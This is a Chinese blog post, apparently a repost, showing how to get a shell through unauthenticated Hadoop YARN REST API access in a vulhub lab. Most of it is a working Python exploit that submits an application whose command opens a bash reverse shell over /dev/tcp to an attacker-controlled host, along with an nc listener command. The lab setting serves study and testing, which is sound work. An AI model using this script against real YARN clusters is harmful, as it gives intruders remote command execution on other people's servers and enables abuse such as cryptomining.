Hadoop 未授权访问 getshell

Hadoop 未授权访问 getshell,第1张

Hadoop 未授权访问 getshell 漏洞概述

YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等 *** 作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为。

受影响范围

Apache Hadoop YARN资源管理系统

环境搭建
cd /vulhub/hadoop/unauthorized-yarn
docker-compose up -d


环境搭建成功,未授权访问到页面

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = 'x.x.x.x' # 修改lhost反dshell的IP

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

nc -lvvp 9999 #监听本地端口9999
运行exp python exploit.py
获取shell

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5711292.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存